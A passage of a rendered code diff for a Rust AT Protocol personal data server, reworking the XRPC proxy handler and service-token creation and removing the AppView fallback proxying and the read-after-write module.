Some(val); 64 - } 65 } 66 - Err(e) => { 67 - warn!("Failed to create service token: {:?}", e); 68 - } 69 } 70 } 71 } 72 - Err(e) => { 73 - warn!("Token validation failed: {:?}", e); 74 - } 75 } 76 } 77 } 78 if let Some(val) = auth_header_val { 79 request_builder = request_builder.header("Authorization", val); 80 } ··· 86 if !body.is_empty() { 87 request_builder = request_builder.body(body); 88 } 89 match request_builder.send().await { 90 Ok(resp) => { 91 let status = resp.status();
··· 1 use crate::api::proxy_client::proxy_client; 2 use crate::state::AppState; 3 use axum::{ 4 + Json, 5 body::Bytes, 6 extract::{Path, RawQuery, State}, 7 http::{HeaderMap, Method, StatusCode}, 8 response::{IntoResponse, Response}, 9 }; 10 + use serde_json::json; 11 use tracing::{error, info, warn}; 12 13 pub async fn proxy_handler( ··· 18 RawQuery(query): RawQuery, 19 body: Bytes, 20 ) -> Response { 21 + let proxy_header = match headers 22 .get("atproto-proxy") 23 .and_then(|h| h.to_str().ok()) 24 + { 25 + Some(h) => h.to_string(), 26 + None => { 27 + return ( 28 + StatusCode::BAD_REQUEST, 29 + Json(json!({ 30 + "error": "InvalidRequest", 31 + "message": "Missing required atproto-proxy header" 32 + })), 33 + ) 34 + .into_response(); 35 } 36 + }; 37 + 38 + let did = proxy_header.split('#').next().unwrap_or(&proxy_header); 39 + let resolved = match state.did_resolver.resolve_did(did).await { 40 + Some(r) => r, 41 None => { 42 + error!(did = %did, "Could not resolve service DID"); 43 + return ( 44 + StatusCode::BAD_GATEWAY, 45 + Json(json!({ 46 + "error": "UpstreamFailure", 47 + "message": "Could not resolve service DID" 48 + })), 49 + ) 50 + .into_response(); 51 } 52 }; 53 + 54 let target_url = match &query { 55 + Some(q) => format!("{}/xrpc/{}?{}", resolved.url, method, q), 56 + None => format!("{}/xrpc/{}", resolved.url, method), 57 }; 58 info!("Proxying {} request to {}", method_verb, target_url); 59 + 60 let client = proxy_client(); 61 let mut request_builder = client.request(method_verb, &target_url); 62 + 63 let mut auth_header_val = headers.get("Authorization").cloned(); 64 + if let Some(token) = crate::auth::extract_bearer_token_from_header( 65 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 66 + ) { 67 + match crate::auth::validate_bearer_token(&state.db, &token).await { 68 + Ok(auth_user) => { 69 + if let Some(key_bytes) = auth_user.key_bytes { 70 + match crate::auth::create_service_token( 71 + &auth_user.did, 72 + &resolved.did, 73 + &method, 74 + &key_bytes, 75 + ) { 76 + Ok(new_token) => { 77 + if let Ok(val) = 78 + axum::http::HeaderValue::from_str(&format!("Bearer {}", new_token)) 79 + { 80 + auth_header_val = Some(val); 81 } 82 + } 83 + Err(e) => { 84 + warn!("Failed to create service token: {:?}", e); 85 } 86 } 87 } 88 + } 89 + Err(e) => { 90 + warn!("Token validation failed: {:?}", e); 91 } 92 } 93 } 94 + 95 if let Some(val) = auth_header_val { 96 request_builder = request_builder.header("Authorization", val); 97 } ··· 103 if !body.is_empty() { 104 request_builder = request_builder.body(body); 105 } 106 + 107 match request_builder.send().await { 108 Ok(resp) => { 109 let status = resp.status();
-456
src/api/read_after_write.rs
··· 1 - use crate::api::ApiError; 2 - use crate::api::proxy_client::{ 3 - MAX_RESPONSE_SIZE, RESPONSE_HEADERS_TO_FORWARD, is_ssrf_safe, proxy_client, 4 - }; 5 - use crate::state::AppState; 6 - use axum::{ 7 - Json, 8 - http::{HeaderMap, HeaderValue, StatusCode}, 9 - response::{IntoResponse, Response}, 10 - }; 11 - use bytes::Bytes; 12 - use chrono::{DateTime, Utc}; 13 - use cid::Cid; 14 - use jacquard_repo::storage::BlockStore; 15 - use serde::{Deserialize, Serialize}; 16 - use serde_json::Value; 17 - use std::collections::HashMap; 18 - use tracing::{error, info, warn}; 19 - use uuid::Uuid; 20 - 21 - pub const REPO_REV_HEADER: &str = "atproto-repo-rev"; 22 - pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag"; 23 - 24 - #[derive(Debug, Clone, Serialize, Deserialize)] 25 - #[serde(rename_all = "camelCase")] 26 - pub struct PostRecord { 27 - #[serde(rename = "$type")] 28 - pub record_type: Option<String>, 29 - pub text: String, 30 - pub created_at: String, 31 - #[serde(skip_serializing_if = "Option::is_none")] 32 - pub reply: Option<Value>, 33 - #[serde(skip_serializing_if = "Option::is_none")] 34 - pub embed: Option<Value>, 35 - #[serde(skip_serializing_if = "Option::is_none")] 36 - pub langs: Option<Vec<String>>, 37 - #[serde(skip_serializing_if = "Option::is_none")] 38 - pub labels: Option<Value>, 39 - #[serde(skip_serializing_if = "Option::is_none")] 40 - pub tags: Option<Vec<String>>, 41 - #[serde(flatten)] 42 - pub extra: HashMap<String, Value>, 43 - } 44 - 45 - #[derive(Debug, Clone, Serialize, Deserialize)] 46 - #[serde(rename_all = "camelCase")] 47 - pub struct ProfileRecord { 48 - #[serde(rename = "$type")] 49 - pub record_type: Option<String>, 50 - #[serde(skip_serializing_if = "Option::is_none")] 51 - pub display_name: Option<String>, 52 - #[serde(skip_serializing_if = "Option::is_none")] 53 - pub description: Option<String>, 54 - #[serde(skip_serializing_if = "Option::is_none")] 55 - pub avatar: Option<Value>, 56 - #[serde(skip_serializing_if = "Option::is_none")] 57 - pub banner: Option<Value>, 58 - #[serde(flatten)] 59 - pub extra: HashMap<String, Value>, 60 - } 61 - 62 - #[derive(Debug, Clone)] 63 - pub struct RecordDescript<T> { 64 - pub uri: String, 65 - pub cid: String, 66 - pub indexed_at: DateTime<Utc>, 67 - pub record: T, 68 - } 69 - 70 - #[derive(Debug, Clone, Serialize, Deserialize)] 71 - #[serde(rename_all = "camelCase")] 72 - pub struct LikeRecord { 73 - #[serde(rename = "$type")] 74 - pub record_type: Option<String>, 75 - pub subject: LikeSubject, 76 - pub created_at: String, 77 - #[serde(flatten)] 78 - pub extra: HashMap<String, Value>, 79 - } 80 - 81 - #[derive(Debug, Clone, Serialize, Deserialize)] 82 - #[serde(rename_all = "camelCase")] 83 - pub struct LikeSubject { 84 - pub uri: String, 85 - pub cid: String, 86 - } 87 - 88 - #[derive(Debug, Default)] 89 - pub struct LocalRecords { 90 - pub count: usize, 91 - pub profile: Option<RecordDescript<ProfileRecord>>, 92 - pub posts: Vec<RecordDescript<PostRecord>>, 93 - pub likes: Vec<RecordDescript<LikeRecord>>, 94 - } 95 - 96 - pub async fn get_records_since_rev( 97 - state: &AppState, 98 - did: &str, 99 - rev: &str, 100 - ) -> Result<LocalRecords, String> { 101 - let mut result = LocalRecords::default(); 102 - let user_id: Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 103 - .fetch_optional(&state.db) 104 - .await 105 - .map_err(|e| format!("DB error: {}", e))? 106 - .ok_or_else(|| "User not found".to_string())?; 107 - let rows = sqlx::query!( 108 - r#" 109 - SELECT record_cid, collection, rkey, created_at, repo_rev 110 - FROM records 111 - WHERE repo_id = $1 AND repo_rev > $2 112 - ORDER BY repo_rev ASC 113 - LIMIT 10 114 - "#, 115 - user_id, 116 - rev 117 - ) 118 - .fetch_all(&state.db) 119 - .await 120 - .map_err(|e| format!("DB error fetching records: {}", e))?; 121 - if rows.is_empty() { 122 - return Ok(result); 123 - } 124 - let sanity_check = sqlx::query_scalar!( 125 - "SELECT 1 as val FROM records WHERE repo_id = $1 AND repo_rev <= $2 LIMIT 1", 126 - user_id, 127 - rev 128 - ) 129 - .fetch_optional(&state.db) 130 - .await 131 - .map_err(|e| format!("DB error sanity check: {}", e))?; 132 - if sanity_check.is_none() { 133 - warn!("Sanity check failed: no records found before rev {}", rev); 134 - return Ok(result); 135 - } 136 - struct RowData { 137 - cid_str: String, 138 - collection: String, 139 - rkey: String, 140 - created_at: DateTime<Utc>, 141 - } 142 - let mut row_data: Vec<RowData> = Vec::with_capacity(rows.len()); 143 - let mut cids: Vec<Cid> = Vec::with_capacity(rows.len()); 144 - for row in &rows { 145 - if let Ok(cid) = row.record_cid.parse::<Cid>() { 146 - cids.push(cid); 147 - row_data.push(RowData { 148 - cid_str: row.record_cid.clone(), 149 - collection: row.collection.clone(), 150 - rkey: row.rkey.clone(), 151 - created_at: row.created_at, 152 - }); 153 - } 154 - } 155 - let blocks: Vec<Option<Bytes>> = state 156 - .block_store 157 - .get_many(&cids) 158 - .await 159 - .map_err(|e| format!("Error fetching blocks: {}", e))?; 160 - for (data, block_opt) in row_data.into_iter().zip(blocks.into_iter()) { 161 - let block_bytes = match block_opt { 162 - Some(b) => b, 163 - None => continue, 164 - }; 165 - result.count += 1; 166 - let uri = format!("at://{}/{}/{}", did, data.collection, data.rkey); 167 - if data.collection == "app.bsky.actor.profile" && data.rkey == "self" { 168 - if let Ok(record) = serde_ipld_dagcbor::from_slice::<ProfileRecord>(&block_bytes) { 169 - result.profile = Some(RecordDescript { 170 - uri, 171 - cid: data.cid_str, 172 - indexed_at: data.created_at, 173 - record, 174 - }); 175 - } 176 - } else if data.collection == "app.bsky.feed.post" { 177 - if let Ok(record) = serde_ipld_dagcbor::from_slice::<PostRecord>(&block_bytes) { 178 - result.posts.push(RecordDescript { 179 - uri, 180 - cid: data.cid_str, 181 - indexed_at: data.created_at, 182 - record, 183 - }); 184 - } 185 - } else if data.collection == "app.bsky.feed.like" 186 - && let Ok(record) = serde_ipld_dagcbor::from_slice::<LikeRecord>(&block_bytes) { 187 - result.likes.push(RecordDescript { 188 - uri, 189 - cid: data.cid_str, 190 - indexed_at: data.created_at, 191 - record, 192 - }); 193 - } 194 - } 195 - Ok(result) 196 - } 197 - 198 - pub fn get_local_lag(local: &LocalRecords) -> Option<i64> { 199 - let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at); 200 - for post in &local.posts { 201 - match oldest { 202 - None => oldest = Some(post.indexed_at), 203 - Some(o) if post.indexed_at < o => oldest = Some(post.indexed_at), 204 - _ => {} 205 - } 206 - } 207 - for like in &local.likes { 208 - match oldest { 209 - None => oldest = Some(like.indexed_at), 210 - Some(o) if like.indexed_at < o => oldest = Some(like.indexed_at), 211 - _ => {} 212 - } 213 - } 214 - oldest.map(|o| (Utc::now() - o).num_milliseconds()) 215 - } 216 - 217 - pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> { 218 - headers 219 - .get(REPO_REV_HEADER) 220 - .and_then(|h| h.to_str().ok()) 221 - .map(|s| s.to_string()) 222 - } 223 - 224 - #[derive(Debug)] 225 - pub struct ProxyResponse { 226 - pub status: StatusCode, 227 - pub headers: HeaderMap, 228 - pub body: bytes::Bytes, 229 - } 230 - 231 - impl ProxyResponse { 232 - pub fn into_response(self) -> Response { 233 - let mut response = Response::builder().status(self.status); 234 - for (key, value) in self.headers.iter() { 235 - response = response.header(key, value); 236 - } 237 - response.body(axum::body::Body::from(self.body)).unwrap() 238 - } 239 - } 240 - 241 - pub async fn proxy_to_appview_via_registry( 242 - state: &AppState, 243 - method: &str, 244 - params: &HashMap<String, String>, 245 - auth_did: &str, 246 - auth_key_bytes: Option<&[u8]>, 247 - ) -> Result<ProxyResponse, Response> { 248 - let resolved = state.appview_registry.get_appview_for_method(method).await.ok_or_else(|| { 249 - ApiError::UpstreamUnavailable(format!("No AppView configured for method: {}", method)).into_response() 250 - })?; 251 - proxy_to_appview_with_url(method, params, auth_did, auth_key_bytes, &resolved.url, &resolved.did).await 252 - } 253 - 254 - pub async fn proxy_to_appview_with_url( 255 - method: &str, 256 - params: &HashMap<String, String>, 257 - auth_did: &str, 258 - auth_key_bytes: Option<&[u8]>, 259 - appview_url: &str, 260 - appview_did: &str, 261 - ) -> Result<ProxyResponse, Response> { 262 - if let Err(e) = is_ssrf_safe(appview_url) { 263 - error!("SSRF check failed for appview URL: {}", e); 264 - return Err( 265 - ApiError::UpstreamUnavailable(format!("Invalid upstream URL: {}", e)).into_response(), 266 - ); 267 - } 268 - let target_url = format!("{}/xrpc/{}", appview_url, method); 269 - info!(target = %target_url, "Proxying request to appview"); 270 - let client = proxy_client(); 271 - let mut request_builder = client.get(&target_url).query(params); 272 - if let Some(key_bytes) = auth_key_bytes { 273 - match crate::auth::create_service_token(auth_did, appview_did, method, key_bytes) { 274 - Ok(service_token) => { 275 - request_builder = 276 - request_builder.header("Authorization", format!("Bearer {}", service_token)); 277 - } 278 - Err(e) => { 279 - error!(error = ?e, "Failed to create service token"); 280 - return Err(ApiError::InternalError.into_response()); 281 - } 282 - } 283 - } 284 - match request_builder.send().await { 285 - Ok(resp) => { 286 - let status = 287 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 288 - let headers: HeaderMap = resp 289 - .headers() 290 - .iter() 291 - .filter(|(k, _)| { 292 - RESPONSE_HEADERS_TO_FORWARD 293 - .iter() 294 - .any(|h| k.as_str().eq_ignore_ascii_case(h)) 295 - }) 296 - .filter_map(|(k, v)| { 297 - let name = axum::http::HeaderName::try_from(k.as_str()).ok()?; 298 - let value = HeaderValue::from_bytes(v.as_bytes()).ok()?; 299 - Some((name, value)) 300 - }) 301 - .collect(); 302 - let content_length = resp.content_length().unwrap_or(0); 303 - if content_length > MAX_RESPONSE_SIZE { 304 - error!( 305 - content_length, 306 - max = MAX_RESPONSE_SIZE, 307 - "Upstream response too large" 308 - ); 309 - return Err(ApiError::UpstreamFailure.into_response()); 310 - } 311 - let body = resp.bytes().await.map_err(|e| { 312 - error!(error = ?e, "Error reading proxy response body"); 313 - ApiError::UpstreamFailure.into_response() 314 - })?; 315 - if body.len() as u64 > MAX_RESPONSE_SIZE { 316 - error!( 317 - len = body.len(), 318 - max = MAX_RESPONSE_SIZE, 319 - "Upstream response body exceeded size limit" 320 - ); 321 - return Err(ApiError::UpstreamFailure.into_response()); 322 - } 323 - Ok(ProxyResponse { 324 - status, 325 - headers, 326 - body, 327 - }) 328 - } 329 - Err(e) => { 330 - error!(error = ?e, "Error sending proxy request"); 331 - if e.is_timeout() { 332 - Err(ApiError::UpstreamTimeout.into_response()) 333 - } else if e.is_connect() { 334 - Err( 335 - ApiError::UpstreamUnavailable("Failed to connect to upstream".to_string()) 336 - .into_response(), 337 - ) 338 - } else { 339 - Err(ApiError::UpstreamFailure.into_response()) 340 - } 341 - } 342 - } 343 - } 344 - 345 - pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response { 346 - let mut response = (StatusCode::OK, Json(data)).into_response(); 347 - if let Some(lag_ms) = lag 348 - && let Ok(header_val) = HeaderValue::from_str(&lag_ms.to_string()) { 349 - response 350 - .headers_mut() 351 - .insert(UPSTREAM_LAG_HEADER, header_val); 352 - } 353 - response 354 - } 355 - 356 - #[derive(Debug, Clone, Serialize, Deserialize)] 357 - #[serde(rename_all = "camelCase")] 358 - pub struct AuthorView { 359 - pub did: String, 360 - pub handle: String, 361 - #[serde(skip_serializing_if = "Option::is_none")] 362 - pub display_name: Option<String>, 363 - #[serde(skip_serializing_if = "Option::is_none")] 364 - pub avatar: Option<String>, 365 - #[serde(flatten)] 366 - pub extra: HashMap<String, Value>, 367 - } 368 - 369 - #[derive(Debug, Clone, Serialize, Deserialize)] 370 - #[serde(rename_all = "camelCase")] 371 - pub struct PostView { 372 - pub uri: String, 373 - pub cid: String, 374 - pub author: AuthorView, 375 - pub record: Value, 376 - pub indexed_at: String, 377 - #[serde(skip_serializing_if = "Option::is_none")] 378 - pub embed: Option<Value>, 379 - #[serde(default)] 380 - pub reply_count: i64, 381 - #[serde(default)] 382 - pub repost_count: i64, 383 - #[serde(default)] 384 - pub like_count: i64, 385 - #[serde(default)] 386 - pub quote_count: i64, 387 - #[serde(flatten)] 388 - pub extra: HashMap<String, Value>, 389 - } 390 - 391 - #[derive(Debug, Clone, Serialize, Deserialize)] 392 - #[serde(rename_all = "camelCase")] 393 - pub struct FeedViewPost { 394 - pub post: PostView, 395 - #[serde(skip_serializing_if = "Option::is_none")] 396 - pub reply: Option<Value>, 397 - #[serde(skip_serializing_if = "Option::is_none")] 398 - pub reason: Option<Value>, 399 - #[serde(skip_serializing_if = "Option::is_none")] 400 - pub feed_context: Option<String>, 401 - #[serde(flatten)] 402 - pub extra: HashMap<String, Value>, 403 - } 404 - 405 - #[derive(Debug, Clone, Serialize, Deserialize)] 406 - pub struct FeedOutput { 407 - pub feed: Vec<FeedViewPost>, 408 - #[serde(skip_serializing_if = "Option::is_none")] 409 - pub cursor: Option<String>, 410 - } 411 - 412 - pub fn format_local_post( 413 - descript: &RecordDescript<PostRecord>, 414 - author_did: &str, 415 - author_handle: &str, 416 - profile: Option<&RecordDescript<ProfileRecord>>, 417 - ) -> PostView { 418 - let display_name = profile.and_then(|p| p.record.display_name.clone()); 419 - PostView { 420 - uri: descript.uri.clone(), 421 - cid: descript.cid.clone(), 422 - author: AuthorView { 423 - did: author_did.to_string(), 424 - handle: author_handle.to_string(), 425 - display_name, 426 - avatar: None, 427 - extra: HashMap::new(), 428 - }, 429 - record: serde_json::to_value(&descript.record).unwrap_or(Value::Null), 430 - indexed_at: descript.indexed_at.to_rfc3339(), 431 - embed: descript.record.embed.clone(), 432 - reply_count: 0, 433 - repost_count: 0, 434 - like_count: 0, 435 - quote_count: 0, 436 - extra: HashMap::new(), 437 - } 438 - } 439 - 440 - pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) { 441 - if posts.is_empty() { 442 - return; 443 - } 444 - let new_items: Vec<FeedViewPost> = posts 445 - .into_iter() 446 - .map(|post| FeedViewPost { 447 - post, 448 - reply: None, 449 - reason: None, 450 - feed_context: None, 451 - extra: HashMap::new(), 452 - }) 453 - .collect(); 454 - feed.extend(new_items); 455 - feed.sort_by(|a, b| b.post.indexed_at.cmp(&a.post.indexed_at)); 456 - }
···
+14 -57
src/api/repo/meta.rs
··· 1 - use crate::api::proxy_client::proxy_client; 2 use crate::state::AppState; 3 use axum::{ 4 Json, 5 - extract::{Query, RawQuery, State}, 6 http::StatusCode, 7 response::{IntoResponse, Response}, 8 }; 9 use serde::Deserialize; 10 use serde_json::json; 11 - use tracing::{error, info}; 12 13 #[derive(Deserialize)] 14 pub struct DescribeRepoInput { 15 pub repo: String, 16 } 17 18 - async fn proxy_describe_repo_to_appview(state: &AppState, raw_query: Option<&str>) -> Response { 19 - let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.describeRepo").await { 20 - Some(r) => r, 21 - None => { 22 - return ( 23 - StatusCode::NOT_FOUND, 24 - Json(json!({"error": "NotFound", "message": "Repo not found"})), 25 - ) 26 - .into_response(); 27 - } 28 - }; 29 - let target_url = match raw_query { 30 - Some(q) => format!("{}/xrpc/com.atproto.repo.describeRepo?{}", resolved.url, q), 31 - None => format!("{}/xrpc/com.atproto.repo.describeRepo", resolved.url), 32 - }; 33 - info!("Proxying describeRepo to AppView: {}", target_url); 34 - let client = proxy_client(); 35 - match client.get(&target_url).send().await { 36 - Ok(resp) => { 37 - let status = 38 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 39 - let content_type = resp 40 - .headers() 41 - .get("content-type") 42 - .and_then(|v| v.to_str().ok()) 43 - .map(|s| s.to_string()); 44 - match resp.bytes().await { 45 - Ok(body) => { 46 - let mut builder = Response::builder().status(status); 47 - if let Some(ct) = content_type { 48 - builder = builder.header("content-type", ct); 49 - } 50 - builder 51 - .body(axum::body::Body::from(body)) 52 - .unwrap_or_else(|_| { 53 - (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response() 54 - }) 55 - } 56 - Err(e) => { 57 - error!("Error reading AppView response: {:?}", e); 58 - (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response() 59 - } 60 - } 61 - } 62 - Err(e) => { 63 - error!("Error proxying to AppView: {:?}", e); 64 - (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response() 65 - } 66 - } 67 - } 68 - 69 pub async fn describe_repo( 70 State(state): State<AppState>, 71 Query(input): Query<DescribeRepoInput>, 72 - RawQuery(raw_query): RawQuery, 73 ) -> Response { 74 let user_row = if input.repo.starts_with("did:") { 75 sqlx::query!( ··· 90 }; 91 let (user_id, handle, did) = match user_row { 92 Ok(Some((id, handle, did))) => (id, handle, did), 93 - _ => { 94 - return proxy_describe_repo_to_appview(&state, raw_query.as_deref()).await; 95 } 96 }; 97 let collections_query = sqlx::query!(
··· 1 use crate::state::AppState; 2 use axum::{ 3 Json, 4 + extract::{Query, State}, 5 http::StatusCode, 6 response::{IntoResponse, Response}, 7 }; 8 use serde::Deserialize; 9 use serde_json::json; 10 11 #[derive(Deserialize)] 12 pub struct DescribeRepoInput { 13 pub repo: String, 14 } 15 16 pub async fn describe_repo( 17 State(state): State<AppState>, 18 Query(input): Query<DescribeRepoInput>, 19 ) -> Response { 20 let user_row = if input.repo.starts_with("did:") { 21 sqlx::query!( ··· 36 }; 37 let (user_id, handle, did) = match user_row { 38 Ok(Some((id, handle, did))) => (id, handle, did), 39 + Ok(None) => { 40 + return ( 41 + StatusCode::NOT_FOUND, 42 + Json(json!({"error": "RepoNotFound", "message": "Repo not found"})), 43 + ) 44 + .into_response(); 45 + } 46 + Err(_) => { 47 + return ( 48 + StatusCode::INTERNAL_SERVER_ERROR, 49 + Json(json!({"error": "InternalError"})), 50 + ) 51 + .into_response(); 52 } 53 }; 54 let collections_query = sqlx::query!(
+2 -1
src/api/repo/record/delete.rs
··· 31 pub async fn delete_record( 32 State(state): State<AppState>, 33 headers: HeaderMap, 34 Json(input): Json<DeleteRecordInput>, 35 ) -> Response { 36 let (did, user_id, current_root_cid) = 37 - match prepare_repo_write(&state, &headers, &input.repo).await { 38 Ok(res) => res, 39 Err(err_res) => return err_res, 40 };
··· 31 pub async fn delete_record( 32 State(state): State<AppState>, 33 headers: HeaderMap, 34 + axum::extract::OriginalUri(uri): axum::extract::OriginalUri, 35 Json(input): Json<DeleteRecordInput>, 36 ) -> Response { 37 let (did, user_id, current_root_cid) = 38 + match prepare_repo_write(&state, &headers, &input.repo, "POST", &uri.to_string()).await { 39 Ok(res) => res, 40 Err(err_res) => return err_res, 41 };
+28 -119
src/api/repo/record/read.rs
··· 1 - use crate::api::proxy_client::proxy_client; 2 use crate::state::AppState; 3 use axum::{ 4 Json, 5 - extract::{Query, RawQuery, State}, 6 http::StatusCode, 7 response::{IntoResponse, Response}, 8 }; ··· 12 use serde_json::json; 13 use std::collections::HashMap; 14 use std::str::FromStr; 15 - use tracing::{error, info}; 16 17 #[derive(Deserialize)] 18 pub struct GetRecordInput { ··· 22 pub cid: Option<String>, 23 } 24 25 - async fn proxy_get_record_to_appview(state: &AppState, raw_query: Option<&str>) -> Response { 26 - let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.getRecord").await { 27 - Some(r) => r, 28 - None => { 29 - return ( 30 - StatusCode::NOT_FOUND, 31 - Json(json!({"error": "NotFound", "message": "Repo not found"})), 32 - ) 33 - .into_response(); 34 - } 35 - }; 36 - let target_url = match raw_query { 37 - Some(q) => format!("{}/xrpc/com.atproto.repo.getRecord?{}", resolved.url, q), 38 - None => format!("{}/xrpc/com.atproto.repo.getRecord", resolved.url), 39 - }; 40 - info!("Proxying getRecord to AppView: {}", target_url); 41 - let client = proxy_client(); 42 - match client.get(&target_url).send().await { 43 - Ok(resp) => { 44 - let status = 45 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 46 - let content_type = resp 47 - .headers() 48 - .get("content-type") 49 - .and_then(|v| v.to_str().ok()) 50 - .map(|s| s.to_string()); 51 - match resp.bytes().await { 52 - Ok(body) => { 53 - let mut builder = Response::builder().status(status); 54 - if let Some(ct) = content_type { 55 - builder = builder.header("content-type", ct); 56 - } 57 - builder 58 - .body(axum::body::Body::from(body)) 59 - .unwrap_or_else(|_| { 60 - (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response() 61 - }) 62 - } 63 - Err(e) => { 64 - error!("Error reading AppView response: {:?}", e); 65 - ( 66 - StatusCode::BAD_GATEWAY, 67 - Json(json!({"error": "UpstreamError"})), 68 - ) 69 - .into_response() 70 - } 71 - } 72 - } 73 - Err(e) => { 74 - error!("Error proxying to AppView: {:?}", e); 75 - ( 76 - StatusCode::BAD_GATEWAY, 77 - Json(json!({"error": "UpstreamError"})), 78 - ) 79 - .into_response() 80 - } 81 - } 82 - } 83 - 84 pub async fn get_record( 85 State(state): State<AppState>, 86 Query(input): Query<GetRecordInput>, 87 - RawQuery(raw_query): RawQuery, 88 ) -> Response { 89 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 90 let user_id_opt = if input.repo.starts_with("did:") { ··· 106 }; 107 let user_id: uuid::Uuid = match user_id_opt { 108 Ok(Some(id)) => id, 109 - _ => { 110 - return proxy_get_record_to_appview(&state, raw_query.as_deref()).await; 111 } 112 }; 113 let record_row = sqlx::query!( ··· 192 pub records: Vec<serde_json::Value>, 193 } 194 195 - async fn proxy_list_records_to_appview(state: &AppState, raw_query: Option<&str>) -> Response { 196 - let resolved = match state.appview_registry.get_appview_for_method("com.atproto.repo.listRecords").await { 197 - Some(r) => r, 198 - None => { 199 - return ( 200 - StatusCode::NOT_FOUND, 201 - Json(json!({"error": "NotFound", "message": "Repo not found"})), 202 - ) 203 - .into_response(); 204 - } 205 - }; 206 - let target_url = match raw_query { 207 - Some(q) => format!("{}/xrpc/com.atproto.repo.listRecords?{}", resolved.url, q), 208 - None => format!("{}/xrpc/com.atproto.repo.listRecords", resolved.url), 209 - }; 210 - info!("Proxying listRecords to AppView: {}", target_url); 211 - let client = proxy_client(); 212 - match client.get(&target_url).send().await { 213 - Ok(resp) => { 214 - let status = 215 - StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 216 - let content_type = resp 217 - .headers() 218 - .get("content-type") 219 - .and_then(|v| v.to_str().ok()) 220 - .map(|s| s.to_string()); 221 - match resp.bytes().await { 222 - Ok(body) => { 223 - let mut builder = Response::builder().status(status); 224 - if let Some(ct) = content_type { 225 - builder = builder.header("content-type", ct); 226 - } 227 - builder 228 - .body(axum::body::Body::from(body)) 229 - .unwrap_or_else(|_| { 230 - (StatusCode::INTERNAL_SERVER_ERROR, "Internal error").into_response() 231 - }) 232 - } 233 - Err(e) => { 234 - error!("Error reading AppView response: {:?}", e); 235 - (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response() 236 - } 237 - } 238 - } 239 - Err(e) => { 240 - error!("Error proxying to AppView: {:?}", e); 241 - (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response() 242 - } 243 - } 244 - } 245 - 246 pub async fn list_records( 247 State(state): State<AppState>, 248 Query(input): Query<ListRecordsInput>, 249 - RawQuery(raw_query): RawQuery, 250 ) -> Response { 251 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 252 let user_id_opt = if input.repo.starts_with("did:") { ··· 268 }; 269 let user_id: uuid::Uuid = match user_id_opt { 270 Ok(Some(id)) => id, 271 - _ => { 272 - return proxy_list_records_to_appview(&state, raw_query.as_deref()).await; 273 } 274 }; 275 let limit = input.limit.unwrap_or(50).clamp(1, 100);
··· 1 use crate::state::AppState; 2 use axum::{ 3 Json, 4 + extract::{Query, State}, 5 http::StatusCode, 6 response::{IntoResponse, Response}, 7 }; ··· 11 use serde_json::json; 12 use std::collections::HashMap; 13 use std::str::FromStr; 14 + use tracing::error; 15 16 #[derive(Deserialize)] 17 pub struct GetRecordInput { ··· 21 pub cid: Option<String>, 22 } 23 24 pub async fn get_record( 25 State(state): State<AppState>, 26 Query(input): Query<GetRecordInput>, 27 ) -> Response { 28 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 29 let user_id_opt = if input.repo.starts_with("did:") { ··· 45 }; 46 let user_id: uuid::Uuid = match user_id_opt { 47 Ok(Some(id)) => id, 48 + Ok(None) => { 49 + return ( 50 + StatusCode::NOT_FOUND, 51 + Json(json!({"error": "RepoNotFound", "message": "Repo not found"})), 52 + ) 53 + .into_response(); 54 + } 55 + Err(_) => { 56 + return ( 57 + StatusCode::INTERNAL_SERVER_ERROR, 58 + Json(json!({"error": "InternalError"})), 59 + ) 60 + .into_response(); 61 } 62 }; 63 let record_row = sqlx::query!( ··· 142 pub records: Vec<serde_json::Value>, 143 } 144 145 pub async fn list_records( 146 State(state): State<AppState>, 147 Query(input): Query<ListRecordsInput>, 148 ) -> Response { 149 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 150 let user_id_opt = if input.repo.starts_with("did:") { ··· 166 }; 167 let user_id: uuid::Uuid = match user_id_opt { 168 Ok(Some(id)) => id, 169 + Ok(None) => { 170 + return ( 171 + StatusCode::NOT_FOUND, 172 + Json(json!({"error": "RepoNotFound", "message": "Repo not found"})), 173 + ) 174 + .into_response(); 175 + } 176 + Err(_) => { 177 + return ( 178 + StatusCode::INTERNAL_SERVER_ERROR, 179 + Json(json!({"error": "InternalError"})), 180 + ) 181 + .into_response(); 182 } 183 }; 184 let limit = input.limit.unwrap_or(50).clamp(1, 100);
+27 -12
src/api/repo/record/write.rs
